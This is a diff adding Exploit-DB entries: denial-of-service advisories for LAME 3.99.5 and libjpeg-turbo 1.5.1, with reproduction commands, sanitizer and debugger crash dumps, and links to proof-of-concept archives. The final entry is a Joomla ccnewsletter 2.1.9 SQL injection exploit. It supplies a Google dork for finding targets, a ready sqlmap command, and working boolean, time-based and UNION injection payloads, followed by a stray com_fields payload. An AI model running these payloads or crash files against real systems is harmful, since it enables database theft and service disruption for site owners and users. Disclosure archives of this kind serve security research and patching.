+SoundTouch_1.9.2_heap_buffer_overflow.wav +CVE: +CVE-2017-9260 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42389.zip diff --git a/platforms/linux/dos/42390.txt b/platforms/linux/dos/42390.txt new file mode 100755 index 000000000..c6c778f55 --- /dev/null +++ b/platforms/linux/dos/42390.txt @@ -0,0 +1,191 @@ +LAME multiple vulnerabilities +================ +Author : qflb.wu +=============== + + +Introduction: +============= +Following the great history of GNU naming, LAME originally stood for LAME Ain't an Mp3 Encoder. +LAME is an educational tool to be used for learning about MP3 encoding. The goal of the LAME project is to use the open source model to improve the psycho acoustics, noise shaping and speed of MP3. + + +Affected version: +===== +3.99.5 + + +Vulnerability Description: +========================== +1. +the fill_buffer_resample function in libmp3lame/util.c in LAME 3.99.5 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted wav file. + + +./lame lame_3.99.5_heap_buffer_overflow.wav out + + +==26618==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c000009f08 at pc 0x5f3a1e bp 0x7ffdfaf74620 sp 0x7ffdfaf74618 +READ of size 4 at 0x60c000009f08 thread T0 + #0 0x5f3a1d in fill_buffer_resample /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:606 + #1 0x5f3a1d in fill_buffer /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:677 + #2 0x55257c in lame_encode_buffer_sample_t /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1736 + #3 0x55257c in lame_encode_buffer_template /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1891 + #4 0x553de1 in lame_encode_buffer_int /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1963 + #5 0x488ba9 in lame_encoder_loop /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:462 + #6 0x488ba9 in lame_encoder /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:531 + #7 0x483c40 in lame_main /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:707 + #8 0x48bee1 in c_main /home/a/Downloads/lame-3.99.5/frontend/main.c:470 + #9 0x48bee1 in main /home/a/Downloads/lame-3.99.5/frontend/main.c:438 + #10 0x7ff8c8771f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) + #11 0x481a6c in _start (/home/a/Downloads/lame-3.99.5/frontend/lame+0x481a6c) + + +0x60c000009f08 is located 8 bytes to the right of 128-byte region [0x60c000009e80,0x60c000009f00) +allocated by thread T0 here: + #0 0x46ba59 in calloc (/home/a/Downloads/lame-3.99.5/frontend/lame+0x46ba59) + #1 0x5f1302 in fill_buffer_resample /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:561 + #2 0x5f1302 in fill_buffer /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:677 + + +SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:606 fill_buffer_resample +Shadow bytes around the buggy address: + 0x0c187fff9390: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa + 0x0c187fff93a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c187fff93b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x0c187fff93c0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa + 0x0c187fff93d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c187fff93e0: fa[fa]fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x0c187fff93f0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa + 0x0c187fff9400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c187fff9410: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x0c187fff9420: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa + 0x0c187fff9430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + ASan internal: fe +==26618==ABORTING + + +POC: +lame_3.99.5_heap_buffer_overflow.wav +CVE: +CVE-2017-9410 + + +2. +the fill_buffer_resample function in libmp3lame/util.c in LAME 3.99.5 can cause a denial of service(invalid memory read and application crash) via a crafted wav file. + + +./lame lame_3.99.5_invalid_memory_read_1.wav out + + +==30841==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000005f24ed sp 0x7ffee94d3050 bp 0x000000000000 T0) + #0 0x5f24ec in fill_buffer_resample /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:608 + #1 0x5f24ec in fill_buffer /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:677 + #2 0x55257c in lame_encode_buffer_sample_t /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1736 + #3 0x55257c in lame_encode_buffer_template /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1891 + #4 0x553de1 in lame_encode_buffer_int /home/a/Downloads/lame-3.99.5/libmp3lame/lame.c:1963 + #5 0x488ba9 in lame_encoder_loop /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:462 + #6 0x488ba9 in lame_encoder /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:531 + #7 0x483c40 in lame_main /home/a/Downloads/lame-3.99.5/frontend/lame_main.c:707 + #8 0x48bee1 in c_main /home/a/Downloads/lame-3.99.5/frontend/main.c:470 + #9 0x48bee1 in main /home/a/Downloads/lame-3.99.5/frontend/main.c:438 + #10 0x7f48b8cacf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) + #11 0x481a6c in _start (/home/a/Downloads/lame-3.99.5/frontend/lame+0x481a6c) + + +AddressSanitizer can not provide additional info. +SUMMARY: AddressSanitizer: SEGV /home/a/Downloads/lame-3.99.5/libmp3lame/util.c:608 fill_buffer_resample +==30841==ABORTING + + +POC: +lame_3.99.5_invalid_memory_read_1.wav +CVE: +CVE-2017-9411 + + +3. +the unpack_read_samples function in frontend/get_audio.c in LAME 3.99.5 can cause a denial of service(invalid memory read and application crash) via a crafted wav file. + + +./lame lame_3.99.5_invalid_memory_read_2.wav out + + +(gdb) r +Starting program: lame file out +[Thread debugging using libthread_db enabled] +Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1". + + +Program received signal SIGSEGV, Segmentation fault. +0x080f27b3 in unpack_read_samples (samples_to_read=-146880, + bytes_per_sample=, swap_order=-2088828928, + pcm_in=0xb6303d80, sample_buffer=) at get_audio.c:1204 +1204 GA_URS_IFLOOP(1) +(gdb) disassemble 0x080f27b3,0x080f27ff +Dump of assembler code from 0x80f27b3 to 0x80f27ff: +=> 0x080f27b3 :mov 0x20000000(%eax),%al + 0x080f27b9 :test %al,%al + 0x080f27bb :je 0x80f27d0 + 0x080f27bd :mov $0x8320b78,%edx + 0x080f27c2 :and $0x7,%edx + 0x080f27c5 :add $0x3,%edx + 0x080f27c8 :cmp %al,%dl + 0x080f27ca :jge 0x80f6715 + 0x080f27d0 :xor $0xf879,%ebx + 0x080f27d6 :add 0x8320b78,%ebx + 0x080f27dc :mov %ebx,%eax + 0x080f27de :shr $0x3,%eax + 0x080f27e1 :mov 0x20000000(%eax),%al + 0x080f27e7 :test %al,%al + 0x080f27e9 :je 0x80f27f8 + 0x080f27eb :mov %ebx,%edx + 0x080f27ed :and $0x7,%edx + 0x080f27f0 :cmp %al,%dl + 0x080f27f2 :jge 0x80f6727 to continue, or q to quit--- + 0x080f27f8 :incb (%ebx) + 0x080f27fa :movl $0x7c3c,%gs%edi) +End of assembler dump. +(gdb) i r +eax 0x837f0000-2088828928 +ecx 0x24489288 +edx 0xbfee5e20-1074897376 +ebx 0x7c3c31804 +esp 0xbfee4c200xbfee4c20 +ebp 0xbfee82780xbfee8278 +esi 0xfffffcf2-782 +edi 0xfffffffc-4 +eip 0x80f27b30x80f27b3 +eflags 0x10246[ PF ZF IF RF ] +cs 0x73115 +ss 0x7b123 +ds 0x7b123 +es 0x7b123 +fs 0x00 +gs 0x3351 +(gdb) x/20x 0x837f0000 +0x837f0000:Cannot access memory at address 0x837f0000 + + +POC: +lame_3.99.5_invalid_memory_read_2.wav +CVE: +CVE-2017-9412 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42390.zip diff --git a/platforms/linux/dos/42391.txt b/platforms/linux/dos/42391.txt new file mode 100755 index 000000000..7ca6c3421 --- /dev/null +++ b/platforms/linux/dos/42391.txt @@ -0,0 +1,141 @@ +libjpeg-turbo denial of service vulnerability +====================== +Author : qflb.wu +CVE : CVE-2017-9614 +====================== + + +Introduction: +============= +libjpeg-turbo is a JPEG image codec that uses SIMD instructions (MMX, SSE2, AVX2, NEON, AltiVec) to accelerate baseline JPEG compression and decompression on x86, x86-64, ARM, and PowerPC systems. + + +Affected version: +===== +1.5.1 + + +Vulnerability Description: +========================== +the fill_input_buffer function in jdatasrc.c in libjpeg-turbo 1.5.1 can cause a denial of service(invalid address and application crash) via a crafted jpg file. + + +I found this bug when I test stills2dv-alpha-0.601 which used the libjpeg-turbo. + + +./stills2dv exampleworkfile.s2d + + +(the exampleworkfile.s2d contains the path of the poc jpg file) + + +----debug info:---- +gdb-peda$ bt +#0 __memcpy_sse2 () at ../sysdeps/x86_64/multiarch/../memcpy.S:166 +#1 0x00007ffff6d82323 in __GI__IO_file_xsgetn (fp=0x61c370, + data=, n=0x1000) at fileops.c:1387 +#2 0x00007ffff6d7786f in __GI__IO_fread (buf=, size=0x1, + count=0x1000, fp=0x61c370) at iofread.c:42 +#3 0x00007ffff7b6e23b in fill_input_buffer (cinfo=0x7fffffffe190) + at jdatasrc.c:107 +#4 0x00007ffff7b7beef in get_dqt (cinfo=0x7fffffffe190) at jdmarker.c:516 +#5 0x00007ffff7b7dba3 in read_markers (cinfo=0x7fffffffe190) + at jdmarker.c:1050 +#6 0x00007ffff7b795fd in consume_markers (cinfo=0x7fffffffe190) + at jdinput.c:320 +#7 0x00007ffff7b6c853 in jpeg_finish_decompress (cinfo=0x7fffffffe190) + at jdapimin.c:399 +#8 0x0000000000402da0 in readjpg ( + fn=fn@entry=0x61c2f4 "example_data_files/test.jpg") at s2d_jpg.c:148 +#9 0x0000000000403c5b in openImage ( + fn=0x61c2f4 "example_data_files/test.jpg", cache=0xffffffff) + at s2d_main.c:202 +#10 0x00000000004063a5 in splitted2struct (p=p@entry=0x60acc0 , + strs=strs@entry=0x61c2a0) at s2d_main.c:1139 +#11 0x000000000040240b in main (argc=argc@entry=0x2, + argv=argv@entry=0x7fffffffe5f8) at s2d_main.c:1404 +#12 0x00007ffff6d2af45 in __libc_start_main (main=0x402040
, argc=0x2, + argv=0x7fffffffe5f8, init=, fini=, + rtld_fini=, stack_end=0x7fffffffe5e8) at libc-start.c:287 +#13 0x0000000000402500 in _start () + + + + +================================================================================= +[------------------------------------------------------------------------------] +Legend: code, data, rodata, value +0x00007ffff7b6e233107 nbytes = JFREAD(src->infile, src->buffer, INPUT_BUF_SIZE); +gdb-peda$ +[----------------------------------registers-----------------------------------] +RAX: 0x61ce30 --> 0x464a1000e0ffd8ff +RBX: 0x7fffffffe190 --> 0x7fffffffe0e0 --> 0x7ffff7b89ce0 (:push rbp) +RCX: 0x61c370 ("example_data_files/test.jpg") +RDX: 0x1000 +RSI: 0x1 +RDI: 0x61ce30 --> 0x464a1000e0ffd8ff +RBP: 0x7fffffffdff0 --> 0x7fffffffe050 --> 0x7fffffffe070 --> 0x7fffffffe0a0 --> 0x7fffffffe0c0 --> 0x61c370 ("example_data_files/test.jpg") +RSP: 0x7fffffffdfd0 --> 0x7fffffffe030 --> 0x0 +RIP: 0x7ffff7b6e236 ( +R8 : 0x67706a2e747365 ('est.jpg') +R9 : 0x7ffff70ca7b8 --> 0x623770 --> 0x0 +R10: 0x7fffffffde90 --> 0x0 +R11: 0x7ffff7b6c74c (:push rbp) +R12: 0x61c2f4 ("example_data_files/test.jpg") +R13: 0x61c5b0 --> 0x61c370 ("example_data_files/test.jpg") +R14: 0xc00 ('') +R15: 0x3 +EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow) +[-------------------------------------code-------------------------------------] + 0x7ffff7b6e229 :mov edx,0x1000 + 0x7ffff7b6e22e :mov esi,0x1 + 0x7ffff7b6e233 :mov rdi,rax +=> 0x7ffff7b6e236 : + call 0x7ffff7b477f0 + 0x7ffff7b6e23b :mov QWORD PTR [rbp-0x10],rax + 0x7ffff7b6e23f :cmp QWORD PTR [rbp-0x10],0x0 + 0x7ffff7b6e244 : + jne 0x7ffff7b6e2bb + 0x7ffff7b6e246 :mov rax,QWORD PTR [rbp-0x8] +Guessed arguments: +arg[0]: 0x61ce30 --> 0x464a1000e0ffd8ff +arg[1]: 0x1 +arg[2]: 0x1000 +arg[3]: 0x61c370 ("example_data_files/test.jpg") +[------------------------------------stack-------------------------------------] +0000| 0x7fffffffdfd0 --> 0x7fffffffe030 --> 0x0 +0008| 0x7fffffffdfd8 --> 0x7fffffffe190 --> 0x7fffffffe0e0 --> 0x7ffff7b89ce0 (:push rbp) +0016| 0x7fffffffdfe0 --> 0x5bffffe0bc +0024| 0x7fffffffdfe8 --> 0x61c880 --> 0x61d028 --> 0x0 +0032| 0x7fffffffdff0 --> 0x7fffffffe050 --> 0x7fffffffe070 --> 0x7fffffffe0a0 --> 0x7fffffffe0c0 --> 0x61c370 ("example_data_files/test.jpg") +0040| 0x7fffffffdff8 --> 0x7ffff7b7beef (:test eax,eax) +0048| 0x7fffffffe000 --> 0x0 +0056| 0x7fffffffe008 --> 0x7fffffffe190 --> 0x7fffffffe0e0 --> 0x7ffff7b89ce0 (:push rbp) +[------------------------------------------------------------------------------] +Legend: code, data, rodata, value +0x00007ffff7b6e236107 nbytes = JFREAD(src->infile, src->buffer, INPUT_BUF_SIZE); +gdb-peda$ x/20x $rdi +0x61ce30:0x464a1000e0ffd8ff0x1c00020101004649 +0x61ce40:0x4300dbff00001c000x28191e231e1c2800 +0x61ce50:0x3c30282b2d2321230x587b3c37373c4164 +0x61ce60:0x8f9699809164495d0xa0c3e6b4a08a8c80 +0x61ce70:0xcbffc88c8aaddaaa0xc19bfffffff5eeda +0x61ce80:0xfffde6fffaffffff0x2d2b014300dbfff8 +0x61ce90:0x764141763c353c2d0xf8f8f8f8a58ca5f8 +0x61cea0:0xf8f8f8f8f8f8f8f80xf8f8f8f8f8f8f8f8 +0x61ceb0:0xf8f8f8f8f8f8f8f80xf8f8f8f8f8f8f8f8 +0x61cec0:0xf8f8f8f8f8f8f8f80xc0fff8f8f8f8f8f8 + + +gdb-peda$ ni +Program received signal SIGSEGV, Segmentation fault. + + +POC: +test.jpg;exampleworkfile.s2d +CVE: +CVE-2017-9614 + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42391.zip diff --git a/platforms/php/webapps/42387.txt b/platforms/php/webapps/42387.txt new file mode 100755 index 000000000..a5f3f38b7 --- /dev/null +++ b/platforms/php/webapps/42387.txt @@ -0,0 +1,44 @@ +"Joomla Component ccnewsletter 2.1.9 - 'sbid' Parameter SQL Injection" + + +# Exploit Title: Joomla Component ccnewsletter 2.1.9 - SQL Injection +# Date: 07-26-2017 +# Exploit Author: Shahab Shamsi +# Vendor Homepage: https://extensions.joomla.org/extension/ccnewsletter/ +# Version: = 2.1.9 [Final Version] +# Tested on: Win,Linux +# Google Dork: inurl:"index.php?option=com_ccnewsletter" inurl:sbid +# Video Refrence: http://securityman.org/joomla-component-ccnewsletter-2-1-9-sql-injection/ + + + + +Sqlmap: + +sqlmap -u "http://Target/index.php?option=com_ccnewsletter&view=detail&id=73&sbid=[SQL]&tmpl=newsletter" -p sbid --dbs + + + + +Testing Method: + - boolean-based blind + - time-based blind + - UNION query + + + +Parameter: sbid (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: option=com_ccnewsletter&view=detail&id=73&sbid=185 AND 3881=3881&tmpl=newsletter + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: option=com_ccnewsletter&view=detail&id=73&sbid=185 AND SLEEP(5)&tmpl=newsletter + Type: AND/OR time-based blind + + Type: UNION query + Title: Generic UNION query (NULL) - 10 columns + Payload: option=com_ccnewsletter&view=detail&id=73&sbid=-3094 UNION ALL SELECT NULL,NULL,CONCAT(0x7162626a71,0x4357474c4d556472646b43704f44476e64694f6a6d6d6873795552656d5446767846466e63677974,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CCQB&tmpl=newsletter + Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) + Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)